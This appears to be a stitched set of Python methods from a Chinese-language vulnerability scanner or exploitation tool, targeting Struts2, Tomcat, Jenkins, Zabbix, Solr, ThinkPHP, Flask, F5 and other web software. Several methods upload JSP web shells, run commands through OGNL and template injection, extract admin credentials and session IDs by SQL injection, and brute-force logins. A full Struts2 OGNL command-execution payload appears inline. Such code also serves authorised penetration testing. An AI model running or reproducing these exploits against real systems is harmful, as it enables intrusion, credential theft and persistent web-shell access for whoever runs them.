def run(self):
if not self.url.startswith("http") and not self.url.startswith(
"https"):
self.url = "http://" + self.url
try:
check_req = request.get(self.url + "/services/AdminService",
headers=self.check_headers,
data=self.check_payload)
if check_req.status_code == 200 and "processing</Admin>" in check_req.text:
print("存在Axis漏洞")
shell__req = request.post(self.url + "/services/RandomService",
data=self.shell_payload,
headers=self.shell_headers)
cmd_req = request.get(self.url + "../shell.jsp?c=echo%20" +
self.capta,
headers=self.headers)
if cmd_req.status_code == 200 and self.capta in cmd_req.text:
print("上传的jsp文件路径为:", self.url + "../shell.jsp")
else:
print("不存在Axis漏洞!")
except Exception as e:
print(e)
return False
finally:
pass
def run(self):
if not self.url.startswith("http") and not self.url.startswith(
"https"):
self.url = "http://" + self.url
if '.action' not in self.url:
self.url = self.url + '/example/HelloWorld.action'
try:
check_req = request.get(self.url + self.check_payload,
headers=self.headers,
stream=True)
if self.capta in check_req.raw.read(50).decode(encoding='utf-8'):
#print('存在S2-005漏洞!')
cmd_req = request.get(self.url + self.cmd_payload,
headers=self.headers,
stream=True)
print('执行whoami命令成功,结果为:',
cmd_req.raw.read(50).decode(encoding='utf-8'))
return True
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
def run(self):
try:
if not self.url.startswith("http") and not self.url.startswith(
"https"):
self.url = "http://" + self.url
if '.action' not in self.url:
self.url = self.url + '/link.action'
check_url = self.url + self.check_payload
check_res = request.get(check_url)
check_str = self.filter(list(check_res.text))
if check_res.status_code == 200 and len(
check_str) < 100 and self.capta in check_str:
cmd_url = self.url + self.cmd_payload
cmd_res = request.get(cmd_url)
cmd_str = self.filter(list(cmd_res.text))
print('存在S2-013漏洞,执行whoami命令成功,执行结果是:', cmd_str)
return True
else:
#print('不存在S2-013漏洞')
return False
except Exception as e:
print(e)
return False
finally:
pass
def run(self):
try:
if not self.url.startswith("http") and not self.url.startswith(
"https"):
self.url = "http://" + self.url
check_url = self.url + self.check_payload
check_url1 = self.url + self.check_payload1
check_req = request.get(check_url)
check_req1 = request.get(check_url1)
if check_req.status_code == 200 and self.capta in check_req.text and check_req1.status_code != 200:
cmd_url = self.url + self.cmd_payload
cmd_req = request.get(cmd_url)
print('存在S2-057漏洞,执行whoami命令成功,执行结果是:', cmd_req.text)
return True
elif check_req1.status_code == 200 and self.capta in check_req.text and check_req.status_code != 200:
cmd_url = self.url + self.cmd_payload1
cmd_req = request.get(cmd_url)
print('存在S2-057漏洞,执行whoami命令成功,执行结果是:', cmd_req.text)
return True
else:
print('不存在S2-057漏洞')
return False
except Exception as e:
print(e)
return False
finally:
pass
def run(self):
if not self.url.startswith("http") and not self.url.startswith(
"https"):
self.url = "http://" + self.url
try:
check_req = request.post(self.url,
headers=self.headers,
data=self.check_payload)
hostname = urlparse(self.url).hostname
port = urlparse(self.url).port
url = 'http://' + str(hostname) + ':' + str(port)
check_req1 = request.get(url + '/check.txt', headers=self.headers)
if check_req1.status_code == 200 and self.capta in check_req1.text:
cmd_req = request.post(self.url,
headers=self.headers,
data=self.cmd_payload)
cmd_req1 = request.get(url + '/cmd.txt', headers=self.headers)
print('存在S2-052漏洞,执行whoami的结果为:', cmd_req1.text)
return True
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
def run(self):
if not self.url.startswith("http") and not self.url.startswith(
"https"):
self.url = "http://" + self.url
result = ""
url = self.url + "/securityRealm/user/admin/search/index?q="
try:
check_req = request.get(url + self.capta, headers=self.headers)
if "Search for '%s'" % (self.capta) in check_req.text:
print('存在Jenkins用户枚举漏洞')
for user in open('app/username.txt', 'r',
encoding='utf-8').readlines():
user = user.strip()
try:
result_req = request.get(url + user,
headers=self.headers)
if 'Jenkins User ID' in result_req.text:
print(user)
except Exception as e:
print(e)
pass
return True
else:
print('不存在Jenkins用户枚举漏洞')
return False
except Exception as e:
print(e)
print('不存在Jenkins用户枚举漏洞')
return False
finally:
pass
def run(self):
if not self.url.startswith("http") and not self.url.startswith(
"https"):
self.url = "http://" + self.url
try:
check_req = request.get(self.url, headers=self.headers)
if "installed Tomcat. Congratulations!" in check_req.text:
for user in open('app/username.txt', 'r',
encoding='utf-8').readlines():
user = user.strip()
for pwd in open('app/password.txt', 'r',
encoding='utf-8').readlines():
if pwd != '':
pwd = pwd.strip()
author = ("%s:%s") % (user, pwd)
self.headers[
"Authorization"] = "Basic " + base64.b64encode(
author.encode('utf-8')).decode('utf-8')
result_req = request.get(self.url + '/manager/html',
headers=self.headers)
if "Tomcat Web Application Manager" in result_req.text:
print('存在Tomcat 弱口令漏洞,账号密码为:', user, pwd)
return True
print('不存在Tomcat 弱口令漏洞')
return False
else:
print('不存在Tomcat 弱口令漏洞')
return False
except Exception as e:
print(e)
print('不存在Tomcat 弱口令漏洞')
return False
finally:
pass
def run(self):
if not self.url.startswith("http") and not self.url.startswith(
"https"):
self.url = "http://" + self.url
url = self.url + "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
try:
check_req = request.get(url, headers=self.headers)
check_response = check_req.text
sql_url = self.url + "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select concat(name,0x3a,passwd) from users limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
sql_req = request.get(sql_url, headers=self.headers)
sql_result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1")
sql_results = sql_result_reg.findall(sql_req.text)
print('存在CVE-2016-10134漏洞,管理员、用户名密码为:', sql_results[0])
session_url = self.url + "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select sessionid from sessions limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
session_req = request.get(session_url, headers=self.headers)
session_result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1")
session_results = session_result_reg.findall(session_req.text)
print('SessionID为:' + session_results[0])
return True
except Exception as e:
#print(e)
print('不存在CVE-2016-10134漏洞')
return False
finally:
pass
def run(self):
if '://' not in self.url:
self.url = 'http://' + self.url
try:
a = random.randint(10000000, 20000000)
b = random.randint(10000000, 20000000)
c = a + b
win = 'set /a ' + str(a) + ' + ' + str(b)
linux = 'expr ' + str(a) + ' + ' + str(b)
header = dict()
header[
"User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
header[
"Content-Type"] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#iswin?(#cmd='" + win + "'):(#cmd='" + linux + "')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
req = request.get(self.url, headers=header)
if str(c) in req.text:
return True
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
def run(self):
"""
检测是否存在漏洞
:param:
:return str True or False
"""
if not self.url.startswith("http") and not self.url.startswith(
"https"):
self.url = "http://" + self.url
if '.action' not in self.url:
self.url = self.url + '/example/HelloWorld.action'
try:
check_req = request.get(self.url + self.check_payload,
headers=self.headers)
if self.capta in check_req.text.replace('\n', ''):
return True
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
def get_title(self, url):
"""
获取网站的title与banner
:param str url: 目标url
:return tuple title,banner: 识别的结果
"""
try:
req = request.get(url)
#获取网站的页面编码
r_detectencode = chardet.detect(req.content)
actual_encode = r_detectencode['encoding']
pagecode = req.content.decode(actual_encode)
response = re.findall('<title>(.*?)</title>', pagecode, re.S)
if response:
#将页面解码为utf-8,获取中文标题
title = response[0]
banner = req.headers['server']
return title, banner
except Exception as e:
print(e)
return '', ''
finally:
pass
def run(self):
if not self.url.startswith("http") and not self.url.startswith(
"https"):
self.url = "http://" + self.url
try:
req = request.get(self.url, headers=self.headers)
if req.headers["www-authenticate"] == "Basic realm=\"dubbo\"":
for user in open('app/username.txt', 'r',
encoding='utf-8').readlines():
user = user.strip()
for pwd in open('app/password.txt', 'r',
encoding='utf-8').readlines():
if pwd != '':
pwd = pwd.strip()
verify_str = user + ":" + pwd
verify_str = base64.b64encode(verify_str)
self.headers['Authorization'] = 'BASIC ' + verify_str
burp_req = requests.session()
burp_resp = burp_req.get(url, headers=self.headers)
if 200 == burp_resp.status_code:
print('存在Dubbo弱口令漏洞')
return True
else:
print('不存在Dubbo弱口令漏洞')
return False
except Exception as e:
#print(e)
print('不存在Dubbo弱口令漏洞')
return False
finally:
pass
def send_exp(self, exp_url):
try:
check_req = request.get(exp_url + self.check_payload,
headers=self.headers)
if check_req.status_code == 200 and self.capta in check_req.text:
cmd_req = request.get(exp_url + self.cmd_payload,
headers=self.headers)
print("存在Solr远程代码执行漏洞,执行whoami结果是:", cmd_req.text)
self.flag = True
else:
print("不存在Solr远程代码执行漏洞")
except Exception as e:
print(e)
print("不存在Solr远程代码执行漏洞")
finally:
pass
def run(self):
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
try:
check_req = request.get(self.url + self.check_payload, headers = self.headers)
if self.capta in check_req.text:
cmd_req = request.get(self.url + self.cmd_payload, headers = self.headers)
print('存在S2-037漏洞,执行whoami命令成功,结果为:', cmd_req.text)
return True
else:
print('不存在S2-037漏洞!')
return False
except Exception as e:
print(e)
return False
finally:
pass
def check(self):
"""
检测是否存在漏洞
:param:
:return True or False
"""
check_req = request.get(self.url + self.check_payload,
headers=self.headers)
if 'password_policy_table' in check_req.text:
return True
hsqldbRsp = request.get(self.url + '/hsqldb;', headers=self.headers)
if 'HSQL Database Engine' in hsqldbRsp.text and hsqldbRsp.status_code == 200:
return True
hsqldbRsp1 = request.get(self.url + '/hsqldb%0a', headers=self.headers)
if 'HSQL Database Engine' in hsqldbRsp1.text and hsqldbRsp1.status_code == 200:
return True
return False
def run(self):
url = "http://www.net.cn/static/customercare/yourip.asp"
try:
local_req = request.get(url)
pattern = re.compile('<h2>(.*?)</h2')
local_ip = re.findall(pattern, local_req.text)[0]
proxies = {'http': self.url}
proxy_req = request.get(url, proxies=proxies)
proxy_ip = re.findall(pattern, proxy_req.text)[0]
if local_ip != proxy_ip:
print('存在Nginx反向代理可访问内网漏洞')
else:
print('不存在Nginx反向代理可访问内网漏洞')
except Exception as e:
print('不存在Nginx反向代理可访问内网漏洞')
#print(e)
return False
finally:
pass
def run(self):
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
try:
check_req = request.get(self.url + "/seeyon/htmlofficeservlet", headers = self.headers)
if check_req.status_code == 200 and "DBSTEP V3.0 0 21 0 htmoffice operate err" in check_req.text :
print("存在seeyou漏洞")
jsp__req = request.post(self.url + "/seeyon/htmlofficeservlet", data = self.payload, headers = self.headers)
cmd_req = request.get(self.url + "/seeyon/test123456.jsp?pwd=asasd3344&cmd=echo asasd3344", headers = self.headers)
if cmd_req.status_code == 200 and "asasd3344" in cmd_req.text:
print("上传的jsp文件路径为:", self.url + "/seeyon/test123456.jsp?pwd=asasd3344&cmd=echo asasd3344")
return True
else:
print("不存在seeyou漏洞")
return False
except Exception as e:
print(e)
return False
finally:
pass
def get_kibana_version(self):
headers = {
'Referer': self.url,
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0',
}
r = request.get(self.url+"/app/kibana", headers = headers)
patterns = ['"version":"(.*?)",', '"version":"(.*?)",']
for pattern in patterns:
match = re.findall(pattern, r.text)
if match:
self.version = match[0]
def check_url(self, url):
try:
req = request.get(url, headers=self.headers)
if "GlassFish" in req.text and req.status_code == 200:
return url
else:
return False
except Exception as e:
return False
finally:
pass
def run(self):
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
try:
check_req = request.put(self.url + "/test.jsp/", data = self.check_file, headers = self.headers)
get_check_req = request.get(self.url + "/test.jsp", headers = self.headers)
if get_check_req.status_code == 200 and 'test' == get_check_req.text:
shell_req = request.put(self.url + "/shell.jsp/", data = self.shell_file, headers = self.headers)
get_shell_req = request.get(self.url + "/shell.jsp", headers = self.headers)
if get_shell_req.status_code == 200:
print ("存在CVE-2017-12615漏洞,shell文件路径为:"+ self.url + "/shell.jsp")
return True
else:
print("不存在CVE-2017-12615漏洞")
return False
except Exception as e:
print(e)
return False
finally:
pass
def checkfile(self, file_path):
try:
print("[+]Trying PUT.." + self.put_file_path)
req = request.get(file_path, headers=self.headers)
if req.status_code == 200 or req.status_code != 404:
return True
else:
return False
except Exception as e:
print("Check File : Wrong")
print(e)
def cmd(self):
"""
执行命令
:param:
:return True or False
"""
try:
if self.check():
cmd_url = self.url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"
cmd_req = request.get(cmd_url)
cmd_str = json.dumps(cmd_req.headers.__dict__['_store'])
if cmd_req.status_code == 200 and 'tmui' in cmd_str:
filesave_req = request.get(
self.url +
self.filesave_payload.format(self.file, 'whoami'))
filesave_str = json.dumps(
filesave_req.headers.__dict__['_store'])
if filesave_req.status_code == 200 and 'tmui' in filesave_str:
list_req = request.get(self.url + self.list_payload)
list_str = json.dumps(
list_req.headers.__dict__['_store'])
if list_req.status_code == 200 and 'tmui' in list_str:
if len(list_req.text) > 33:
command_result = json.loads(
list_req.text)['output']
delete_req = request.get(self.url +
self.delete_payload)
response_str = json.dumps(
delete_req.headers.__dict__['_store'])
# return command_result
return True
return False
else:
return False
else:
return False
except Exception as e:
return False
finally:
pass
def run(self):
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
url1_400 = self.url + "/san1e*~1****/a.aspx"
url1_404 = self.url + "/*~1****/a.aspx"
try:
req_400 = request.get(url1_400, headers = self.headers)
req_404 = request.get(url1_404, headers = self.headers)
if req_400.status_code == 400 and req_404.status_code == 404:
result = "exists IIS short filename vuln"
print('存在IIS短文件名漏洞')
return True
else:
print('不存在IIS短文件名漏洞')
return False
except Exception as e:
print(e)
print('不存在IIS短文件名漏洞')
return False
finally:
pass
def run(self):
try:
if not self.url.startswith("http") and not self.url.startswith(
"https"):
self.url = "http://" + self.url
self.check_url = self.url + self.check_payload
check_req = request.get(self.check_url, headers=self.headers)
if check_req.status_code == 200 and self.capta in check_req.text:
self.cmd_url = self.url + self.cmd_payload
cmd_req = request.get(self.cmd_url, headers=self.headers)
print('存在ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞,执行whoami命令成功,执行结果是:',
cmd_req.text.replace('\n', ''))
return True
else:
print('不存在ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞')
return False
except Exception as e:
print(e)
return False
finally:
pass
def check_jar_exsits(self):
list_jar_url = self.url + "/jars/"
try:
response = request.get(list_jar_url, headers = self.headers)
if response.status_code == 200 and "application/json" in response.headers.get("Content-Type", ""):
r = json.loads(response.text)
for upload_file in r['files']:
if str(upload_file['id']).endswith('{}'.format(self.upload_jar_name)):
return upload_file['id']
except Exception as e:
print(e)
return False
def run(self):
try:
if not self.url.startswith("http") and not self.url.startswith(
"https"):
self.url = "http://" + self.url
check_req = request.get(self.url + self.check_payload,
headers=self.headers)
if check_req.text == 'Hello 54289' and check_req.status_code == 200:
print('存在Flask SSTI漏洞,执行whoami命令结果为:')
cmd_req = request.get(self.url + self.cmd_payload,
headers=self.headers)
print(cmd_req.text.replace('\n', ''))
return True
else:
print('不存在Flask SSTI漏洞')
return False
except Exception as e:
print(e)
return False
finally:
pass
def check(self):
if not self.url.startswith("http") and not self.url.startswith(
"https"):
self.url = "http://" + self.url
flag, accessible = self.ACL_PATCHED, False
try:
# check ANONYMOUS_READ
anonymous_read_req = request.get(self.url, headers=self.headers)
if anonymous_read_req.status_code == 200 and 'adjuncts' in anonymous_read_req.text:
flag, accessible = self.READ_ENABLE, True
print('ANONYMOUS_READ enable!')
elif anonymous_read_req.status_code == 403:
print('ANONYMOUS_READ disable!')
# check ACL bypass, CVE-2018-1000861
check_acl_bypass_req = request.get(self.url +
'/securityRealm/user/admin',
headers=self.headers)
if check_acl_bypass_req.status_code == 200 and 'adjuncts' in check_acl_bypass_req.text:
flag, accessible = self.READ_BYPASS, True
else:
flag = self.NOT_JENKINS
# check entry point, CVE-2019-1003005
if accessible:
if flag is self.READ_BYPASS:
url = self.url + '/securityRealm/user/admin'
else:
url = self.url
check_entry_req = request.get(
self.url +
'/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript',
headers=self.headers)
if check_entry_req.status_code == 404:
flag = self.ENTRY_NOTFOUND
except Exception as e:
print(e)
finally:
pass
return flag
def xml_url():
xml_url = self.url + '/vpn/../vpns/portal/%s.xml' % self.cdl
headers = {
'User-Agent':
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
'NSC_USER': '******',
'NSC_NONCE': 'nsroot'
}
req = request.get(xml_url, headers=headers)
if req.status_code == 200:
print('Xml_Url=', xml_url)
print('Command=', cmd)
print('Exec Result:\n%s\n' % req.content.split("u")[0])
def run(self):
if not self.url.startswith("http") and not self.url.startswith(
"https"):
self.url = "http://" + self.url
try:
check_req = request.get(self.url + self.check_payload,
headers=self.headers)
if self.capta in check_req.text:
cmd_req = request.get(self.url + self.cmd_payload,
headers=self.headers)
result = re.findall('''Message</b>(.*?).jsp''', cmd_req.text)
cmd_str = re.sub('/', '', result[0])
cmd_str = re.sub('%0A', '\n', cmd_str)
#print('存在S2-015漏洞,执行whoami命令成功,结果为:', cmd_str)
return True
else:
#print('不存在S2-015漏洞!')
return False
except Exception as e:
print(e)
return False
finally:
pass
def run(self):
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
try:
check_req = request.get(self.url + self.check_payload, headers = self.headers)
check_req_text = check_req.text.replace('\n', '')
check_req_text = check_req_text.replace(' ', '')
check_result = re.findall('<input.*?value="(.*?)".*?/>', check_req_text)
if self.capta in check_result:
cmd_req = request.get(self.url + self.cmd_payload, headers = self.headers)
cmd_req_text = cmd_req.text.replace('\n', '')
cmd_req_text = cmd_req_text.replace(' ', '')
cmd_result = re.findall('<input.*?value="(.*?)".*?/>', cmd_req_text)
print('存在S2-029漏洞,执行whoami命令成功,结果为:', cmd_result)
return True
else:
print('不存在S2-029漏洞!')
return False
except Exception as e:
print(e)
return False
finally:
pass